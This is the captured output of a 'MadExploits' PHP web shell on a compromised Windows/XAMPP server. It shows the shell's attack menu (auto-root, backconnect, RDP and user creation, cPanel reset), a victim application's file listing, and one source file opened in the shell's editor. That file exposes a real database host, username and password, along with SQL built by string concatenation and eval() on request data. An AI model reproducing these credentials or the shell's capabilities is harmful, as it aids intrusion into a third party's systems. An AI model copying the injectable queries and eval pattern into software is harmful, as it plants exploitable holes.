Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
htdocs /
edgpens_220424 /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxrwxrwx
edg
[ DIR ]
drwxrwxrwx
edg_200430
[ DIR ]
drwxrwxrwx
edg_20200630
[ DIR ]
drwxrwxrwx
edg_o
[ DIR ]
drwxrwxrwx
edg_old
[ DIR ]
drwxrwxrwx
extension
[ DIR ]
drwxrwxrwx
img
[ DIR ]
drwxrwxrwx
inc
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxrwxrwx
kod
[ DIR ]
drwxrwxrwx
upload
[ DIR ]
drwxrwxrwx
utility
[ DIR ]
drwxrwxrwx
!test.php
17
B
-rw-rw-rw-
Nota14102020.docx
22.8
KB
-rw-rw-rw-
access.php
253
B
-rw-rw-rw-
access2.php
245
B
-rw-rw-rw-
account_recovery.php
6.56
KB
-rw-rw-rw-
ajax.php
2.43
KB
-rw-rw-rw-
custom.css
3.35
KB
-rw-rw-rw-
custom.js
7.03
KB
-rw-rw-rw-
custom200630.js
6.46
KB
-rw-rw-rw-
custom_200630.css
1.04
KB
-rw-rw-rw-
custom_200705.js
6.82
KB
-rw-rw-rw-
custom_210125.css
2.22
KB
-rw-rw-rw-
dashboard.php
21.63
KB
-rw-rw-rw-
dashboard_old.php
51
B
-rw-rw-rw-
dglist.php
3.97
KB
-rw-rw-rw-
err_404.php
75
B
-rw-rw-rw-
index.php
2.49
KB
-rw-rw-rw-
licenses.php
103
B
-rw-rw-rw-
login.php
9.8
KB
-rw-rw-rw-
login_o.php
9.81
KB
-rw-rw-rw-
main.php
584
B
-rw-rw-rw-
microsoft.php
214.77
KB
-rw-rw-rw-
odbc.php
12.43
KB
-rw-rw-rw-
odbc_212801.php
12.77
KB
-rw-rw-rw-
recover_msg.php
806
B
-rw-rw-rw-
reset_password.php
8.84
KB
-rw-rw-rw-
sessions.php
2.04
KB
-rw-rw-rw-
sessions_200705.php
1.4
KB
-rw-rw-rw-
sessions_200721.php
1.75
KB
-rw-rw-rw-
test_sess.php
1.35
KB
-rw-rw-rw-
testinput.php
6.7
KB
-rw-rw-rw-
~$ta14102020.docx
162
B
-rw-rw-rw-
~WRL0738.tmp
23.29
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : odbc_212801.php
<?php error_reporting(1); date_default_timezone_set('Asia/Kuala_Lumpur'); $GLOBALS['mysqli'] = new mysqli("172.16.0.67", "edgpens", "c6IRnSzhF87XFGtE", "edgpens"); if ($mysqli->connect_errno) { echo "Failed to connect to MySQL: (" . $mysqli_link->connect_errno . ") " . $mysqli_link->connect_error; exit(); } $mysqli_link = new mysqli("172.16.0.67", "edgpens", "c6IRnSzhF87XFGtE", "edgpens"); if ($mysqli_link->connect_errno) { echo "Failed to connect to MySQL: (" . $mysqli_link->connect_errno . ") " . $mysqli_link->connect_error; } //---------------------------------------------------------------------------------- // Delete a session and return. //---------------------------------------------------------------------------------- function deleteSession($session){ global $mysqli; // $query="DELETE FROM utiliti_session WHERE iduser!=1 AND session = '$session'"; $query="DELETE FROM utiliti_session WHERE session = '$session'"; $mysqli->query($query); return; } //---------------------------------------------------------------------------------- // Update session time if it exists. //---------------------------------------------------------------------------------- function updateSession($session){ global $mysqli; checkSession(); $query="SELECT * FROM utiliti_session WHERE session='$session'"; $result=$mysqli->query($query); $row=$result->fetch_assoc(); if ($row){ $time=getdate(time()); $s="update utiliti_session set masa='".$time['year']."-".$time['mon']."-".$time['mday']." ".$time['hours'].":".$time['minutes'].":".$time['seconds']."' where session='$session'"; if(!$r=$mysqli->query($s)) echo $s."<br>Fail to updating the session ".$r; }else{ $session=false; } return $session; } //---------------------------------------------------------------------------------- // Log user in. If user already has a session then security risk. Throw them out. //---------------------------------------------------------------------------------- function login($passedusername,$passedpassword){ global $mysqli; checkSession(); $passedpassword= md5($passedpassword); // $query="SELECT * FROM utiliti_user WHERE up_id='$passedusername'"; // $result=$mysqli->query($query) or die(mysqli_error($mysqli)); $stmt = $mysqli->stmt_init(); $stmt->prepare("SELECT * FROM user_list WHERE emailUser=?"); // $stmt->prepare("SELECT * FROM user_list"); $emailUser = $passedusername; $stmt->bind_param("s",$emailUser); $stmt->execute(); $result = $stmt->get_result(); $stmt->close(); $session = array(); $row=$result->fetch_assoc(); if ($row){ $userid = $row['idUser']; $nama = strtoupper($row['nameUser']); $password = $row['passwordUser']; $trkMula = $row['date_start']; $trkTamat = $row['date_end']; $flagUser = $row['flagUser']; if($password==$passedpassword){ if($flagUser == 3){ $session[0] = "Ops! Something Wrong.<br>Please Contact System Administrators."; $session[1] = false; $session[3] = 1; }else if($flagUser == 2){ $session[0] = "Ops! Your Login Have Been Blocked.<br>Please Contact System Administrators."; $session[1] = false; $session[3] = 1; // }if(empty($trkMula)){ // $session[0] = "Ops! Something Wrong.<br>Please Contact System Administrators."; // $session[1] = false; // $session[3] = 1; // }else if ($trkTamat!='' And $trkTamat<>'0000-00-00' And $trkTamat<date("Y-m-d")){ // $t=strtotime ($trkTamat); // $session[0] = "You Cannot Enter This System Anymore. Started From ".date("d-M-Y",$t); // $session[1] = false; // $session[3] = 1; // }else if ( $trkMula>date("Y-m-d")){ // $t=strtotime ($trkMula); // $session[0] = "You Can Access This System Start From ".date("d-M-Y",$t); // $session[1] = false; // $session[3] = 1; }else {//ok to proceed. $session[0] = "Welcome Back. {$nama}"; $session[1] = checkUser($userid); //check to see if user is already logged in $session[3] = 0; if ($session[1]){ deleteSession($session[1]);//Force the user out if already logged in $session[1]=setSession($userid); }else{ $session[1]=setSession($userid); } } }else{ $session[0] = "Please Try Again!"; $session[1] = false; $session[3] = 1; } }else{ $session[0] = "Please Try Again!"; $session[1] = false; $session[3] = 1; } return $session; } //---------------------------------------------------------------------------------- // Set a session and insert session into session table. //---------------------------------------------------------------------------------- function setSession($userid){ global $mysqli; $time=getdate(time()); $length=80;// set this to the length of session variable desired $session=""; mt_srand(time()); $sessionstring="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; $achar=strlen($sessionstring)-1; for ($i=0;$i<$length;$i++){ $session.=$sessionstring[mt_rand(0,$achar)]; } $session=$userid.$session; $query = "INSERT INTO utiliti_session (session,idUser,masa) VALUES ('$session','$userid','".$time['year']."-".$time['mon']."-".$time['mday']." ".$time['hours'].":".$time['minutes'].":".$time['seconds']."')"; $mysqli->query($query) or die(mysqli_error($mysqli)); return $session; } //-------------------------------------------------------------------------------- // Check the user to see if they are already logged in. //-------------------------------------------------------------------------------- function checkUser($userid){ global $mysqli; $query="SELECT * FROM utiliti_session WHERE idUser = '$userid'"; $result=$mysqli->query($query); $row=$result->fetch_assoc(); if ($row){ $session=$row['session']; }else{ $session = false; } return $session; } //---------------------------------------------------------------------------------- // Log the user out when they click on the log-out button //---------------------------------------------------------------------------------- function logout($session){ global $mysqli; $query="SELECT * FROM utiliti_session WHERE session = '$session'"; $result=$mysqli->query($query); $row=$result->fetch_assoc(); if ($row){ $userid=$row['idUser']; deleteSession($session); return true; }else{ return false; } } //---------------------------------------------------------------------------------- // Check session and return. //---------------------------------------------------------------------------------- function checkSession(){ global $mysqli; $expirationtime=time()-1800; // set this to seconds of inactivity before forced logout (30mins) // $expirationtime=time()-6000; // set this to seconds of inactivity before forced logout (100mins) $time=getdate($expirationtime); $query = "SELECT idUser,session,masa From utiliti_session WHERE masa < '".$time['year']."-".$time['mon']."-".$time['mday']." ".$time['hours'].":".$time['minutes'].":".$time['seconds']."'"; $result=$mysqli->query($query) or die(mysqli_error($mysqli)); while($row=$result->fetch_assoc()){ deleteSession($row[1]); } return; } function growl_me($sess = null,$g_scc){ $type = $g_scc; $msg = (!empty($sess)) ? $sess['success_msg'] : ""; if($g_scc == 1 && !empty($sess['success_msg'])){ echo "<script>$(document).ready(function(){ $.testme({$type},\"{$msg}\"); });</script>"; } if($g_scc == 2 && !empty($sess['success_msg'])){ echo "<script>$(document).ready(function(){ $.testme({$type},\"{$msg}\"); });</script>"; } if($g_scc == 3 && !empty($sess['success_msg'])){ echo "<script>$(document).ready(function(){ $.testme({$type},\"{$msg}\"); });</script>"; } } function get_user($sess){ global $mysqli; $query="SELECT * FROM utiliti_session WHERE session='$sess'"; $result=$mysqli->query($query); $row=$result->fetch_assoc(); // $stmt->prepare("SELECT * FROM utiliti_session WHERE session=?"); // $running_sql = $sess; // $stmt->bind_param("s",$iduser,$running_sql,$descr); // $stmt->execute(); // $result = $stmt->get_result(); // $row = $result->fetch_assoc(MYSQLI_ASSOC); // $stmt->close(); return $row; } function get_user_full($sess){ global $mysqli; $query="SELECT * FROM utiliti_session WHERE session='$sess'"; $result=$mysqli->query($query); $row=$result->fetch_assoc(); $query="SELECT * FROM user_list WHERE idUser='{$row['idUser']}'"; $result=$mysqli->query($query); $row=$result->fetch_assoc(); return $row; } function mysqli_prepare_audit($sql,$param_type,$param_data,$param_do = null,$query_type = null){ /* Hamdi : 2020-03-20 This Function Only for Insert/Update/Delete use. */ global $mysqli; $user = get_user($_SESSION['session']); $conn = $mysqli; $stmt = $conn->stmt_init(); $stmt->prepare($sql); $comb_param = ""; $length_type = strlen($param_type); $length_data = count($param_data); $type_auto = ""; foreach ($param_data as $a => $b) { $comb_param1 .= "\${$a}=\"{$b}\","; $comb_param2 .= "\${$a}=\"{$b}\",\n"; $type_auto .= "s"; } if($length_type != $length_data || $param_type == 'auto') $param_type = $type_auto; $data = array(); $comb_param1 = substr($comb_param1, 0, -1); $comb_param2 = $sql.";\n".substr($comb_param2, 0, -2); "\$stmt->bind_param(\"".$param_type."\",".$comb_param1.");"; eval("\$stmt->bind_param(\"".$param_type."\",".$comb_param1.");"); if (!$stmt->execute()) { echo 'error executing statement: ' . $stmt->error; $stmt->close(); }else{ $data[0] = $mysqli->insert_id; $stmt->close(); audit_insert($comb_param2,$descr); } return $data; } function mysqli_prepare_all($sql,$param_type,$param_data){ /* Hamdi : 2020-12-07 This Function for All Query. */ global $mysqli; // $user = get_user($_SESSION['session']); $conn = $mysqli; $stmt = $conn->stmt_init(); $stmt->prepare($sql); $comb_param = ""; $length_type = strlen($param_type); $length_data = count($param_data); $type_auto = ""; foreach ($param_data as $a => $b) { $comb_param1 .= "\${$a}=\"{$b}\","; $comb_param2 .= "\${$a}=\"{$b}\",\n"; $type_auto .= "s"; } if($length_type != $length_data || $param_type == 'auto') $param_type = $type_auto; $data = array(); $comb_param1 = substr($comb_param1, 0, -1); $comb_param2 = $sql.";\n".substr($comb_param2, 0, -2); "\$stmt->bind_param(\"".$param_type."\",".$comb_param1.");"; eval("\$stmt->bind_param(\"".$param_type."\",".$comb_param1.");"); $stmt->execute() or trigger_error($stmt->error, E_USER_ERROR); ($result = $stmt->get_result()) or trigger_error($stmt->error, E_USER_ERROR); $stmt->close(); return $result; } function audit_insert($running_sql,$descr = null){ global $mysqli; $user = get_user($_SESSION['session']); $stmt = $mysqli->stmt_init(); $stmt->prepare("insert into audit_trail (idUser,running_sql,descr) values (?,?,?)"); $iduser = $user['idUser']; // $running_sql = $comb_param2; $descr = (empty($descr)) ? '' : $descr ; $stmt->bind_param("sss",$iduser,$running_sql,$descr); $stmt->execute(); $stmt->close(); } function mysql_date($date){ explode('-', $date); return $date[3]."-".$date[2]."-".$date[1]; } // function mysqli_prepare_audit2(){ // global $mysqli; // $stmt = $mysqli->stmt_init(); // $stmt->prepare($sql); // $comb_param = ""; // $length_type = strlen($param_type); // $length_data = count($param_data); // $type_auto = ""; // foreach ($param_data as $a => $b) { // $comb_param1 .= "\${$a}=\"{$b}\","; // $comb_param2 .= "\${$a}=\"{$b}\",\n"; // $type_auto .= "s"; // } // if($length_type != $length_data || $param_type == 'auto') // $param_type = $type_auto; // $data = array(); // $comb_param1 = substr($comb_param1, 0, -1); // $comb_param2 = $sql.";\n".substr($comb_param2, 0, -2); // "\$stmt->bind_param(\"".$param_type."\",".$comb_param1.");"; // eval("\$stmt->bind_param(\"".$param_type."\",".$comb_param1.");"); // $stmt->execute(); // // execute the stored Procedure // $result = $connect->query('call IsUserPresent(@uid, @userCount)'); // // getting the value of the OUT parameter // $r = $connect->query('SELECT @userCount as userCount'); // $row = $r->fetch_assoc(); // } ?>
Close
